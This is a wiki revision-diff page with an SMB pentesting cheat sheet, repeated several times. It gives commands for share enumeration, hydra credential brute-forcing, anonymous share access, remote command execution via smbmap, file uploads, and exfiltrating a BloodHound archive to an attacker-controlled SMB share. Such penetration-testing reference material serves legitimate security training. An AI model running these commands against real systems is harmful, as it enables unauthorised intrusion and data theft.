SMB: Difference between revisions

From RCATs
(nothing)
 
No edit summary
Line 146: Line 146:


Connect with smbclient
Connect with smbclient
smbclient -L 10.0.0.1
smbclient -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -L 10.0.0.1 -U username
smbclient -L 10.0.0.1 -U username
Anonymous
Anonymous
smbclient //10.0.0.1/somedir -N
smbclient //10.0.0.1/somedir -N
With a space in the dir we “”
With a space in the dir we “”
smbclient "//10.0.0.1/some dir" -N
smbclient "//10.0.0.1/some dir" -N
Specify shared directory
Specify shared directory
smbclient //10.0.0.1/somedir -U username
smbclient //10.0.0.1/somedir -U username
Specify workgroup
Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username
smbclient -L 10.0.0.1 -W WORKGROUP -U username
Line 162: Line 167:




                    Commands in SMB
                                                                  '''Commands in SMB'''
 
Once Connected we can find sensitive files or information and we love that as hackers dont we.
Once Connected we can find sensitive files or information and we love that as hackers dont we.


List Files
List Files
smb> ls
smb> ls


Download a file
Download a file
smb> get sample.txt
smb> get sample.txt


Put a file can be txt,pdf,php ect..
Put a file can be txt,pdf,php etc..
 
smb> put sample.txt
smb> put sample.txt


Line 181: Line 190:


We can use smbget from our local machine as well
We can use smbget from our local machine as well
smbget -R smb://<target-ip>/somedir -U username
smbget -R smb://<target-ip>/somedir -U username


           Specify workgroup
           Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username


         as anonymous user
         as anonymous user
smbget smb://<target-ip>/somedir -U anonymous
smbget smb://<target-ip>/somedir -U anonymous
password: anonymous
password: anonymous
Line 192: Line 204:
Transfer a file from windows to my attacker machine
Transfer a file from windows to my attacker machine
In your local kali make a directory that you want that file to go into.
In your local kali make a directory that you want that file to go into.
mk dir smb
mk dir smb
Next we will run impacket-smbserver
Next we will run impacket-smbserver
sudo impacket-smbserver -smb2support share $(pwd)
sudo impacket-smbserver -smb2support share $(pwd)
Then we will transfer the file over to that share we just set up with impacket-smbserver.
Then we will transfer the file over to that share we just set up with impacket-smbserver.
powershell copy bloodhound.zip \\attackip\share\
powershell copy bloodhound.zip \\attackip\share\


I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.
I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.

Revision as of 14:03, 21 January 2023

SMB (Server Message Block) Pentesting

Last modified: 2022-12-21 Active Directory Windows

It allows clients, like workstations, to communicate with a server like a share directory. Samba is derived from SMB for linux. Default ports are 139, 445. Enumeration

To enumerate automatically, you can use nmap.

nmap --script smb-brute -p 445 <target-ip> nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip> nmap --script smb-enum* -p 445 <target-ip> nmap --script smb-protocols -p 445 <target-ip> nmap --script smb-vuln* -p 445 <target-ip>

Enum4linux

Enum4linux enumerates the users, share directories, etc.

  1. Basic

enum4linux <target-ip>

  1. All enumeration

enum4linux -a <target-ip>

  1. Verbose

enum4linux -v <target-ip>

  1. Specify username and password

enum4linux -u username -p password <target-ip>

Smbmap

smbmap -H <target-ip>

  1. Recursive

smbmap -H <target-ip> -R

  1. Username and password

smbmap -u username -p password -H <target-ip>

  1. Execute a command

smbmap -u username -p password -H <target-ip> -x 'ipconfig'


Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> smb hydra -L usernames.txt -p password <target-ip> smb


Connect

You can use smbclient to connect the target.

smbclient -L 10.0.0.1 smbclient -N -L 10.0.0.1 smbclient -N -L \\\\10.0.0.1 smbclient -L 10.0.0.1 -U username

  1. anonymous

smbclient //10.0.0.1/somedir -N

  1. with space use the "" double quotes

smbclient "//10.0.0.1/some dir" -N

  1. Specify shared directory

smbclient //10.0.0.1/somedir -U username

  1. nobody, no-pass

smbclient //10.0.0.1/somedir -N -U nobody

  1. Specify workgroup

smbclient -L 10.0.0.1 -W WORKGROUP -U username


Commands in SMB

After connecting, you can find the sensitive files or information.

  1. List files

smb> ls

  1. Download a file

smb> get sample.txt

To download files recursively, run the following commands.

smb> mask "" smb> recurse ON smb> prompt OFF smb> mget *

Or using smbget from local machine.

smbget -R smb://<target-ip>/somedir -U username

  1. Specify workgroup

smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

  1. as anonymous user

smbget smb://<target-ip>/somedir -U anonymous password: anonymous


transfer a file from windows to my attacker machine.


In my kali machine

mk dir smb

sudo impacket-smbserver -smb2support share $(pwd)

powershell copy bloodhound.zip \\attackip\share\



18.4.11.A. SMB Pentesting

SMB stands for Server Message Block. Default ports are 445, 139. Ok what does it do? Glad you asked. It allows clients, like workstations, to communicate with a server like a share directory. SMB Enumeration Auto enum can be done with nmap like so. Pay attention here the port may be different but no all the time and of course the ip will be different.

nmap --script smb-brute -p 445 <target-ip> nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip> nmap --script smb-enum* -p 445 <target-ip> nmap --script smb-protocols -p 445 <target-ip> nmap --script smb-vuln* -p 445 <target-ip> Enum4Linux enumerates the users, share directories, etc. enum4linux <target-ip> # Basic use. enum4linux -a <target-ip> # All Enum. enum4linux -v <target-ip> # Verbose. enum4linux -u username -p password <target-ip> #Specify username and password this can get us even more information as we will have accessed that users share. Smbmap smbmap -H <target-ip> smbmap -H <target-ip> -R # Recursive lookup. smbmap -u username -p password -H <target-ip> # Username and Password smbmap -u username -p password -H <target-ip> -x 'ipconfig' # Execute a command

Brute Force Credentials hydra -l username -P passwords.txt <target-ip> smb hydra -L usernames.txt -p password <target-ip> smb

Connect with smbclient

smbclient -L 10.0.0.1 smbclient -N -L 10.0.0.1 smbclient -N -L \\\\10.0.0.1 smbclient -L 10.0.0.1 -U username

Anonymous smbclient //10.0.0.1/somedir -N

With a space in the dir we “” smbclient "//10.0.0.1/some dir" -N

Specify shared directory smbclient //10.0.0.1/somedir -U username

Specify workgroup smbclient -L 10.0.0.1 -W WORKGROUP -U username



                                                                 Commands in SMB

Once Connected we can find sensitive files or information and we love that as hackers dont we.

List Files

smb> ls

Download a file

smb> get sample.txt

Put a file can be txt,pdf,php etc..

smb> put sample.txt

Download files recursively smb> mask "" smb> recurse ON smb> prompt OFF smb> mget *

We can use smbget from our local machine as well

smbget -R smb://<target-ip>/somedir -U username

         Specify workgroup

smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

        as anonymous user

smbget smb://<target-ip>/somedir -U anonymous password: anonymous

Transfer a file from windows to my attacker machine In your local kali make a directory that you want that file to go into.

mk dir smb

Next we will run impacket-smbserver

sudo impacket-smbserver -smb2support share $(pwd)

Then we will transfer the file over to that share we just set up with impacket-smbserver.

powershell copy bloodhound.zip \\attackip\share\

I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.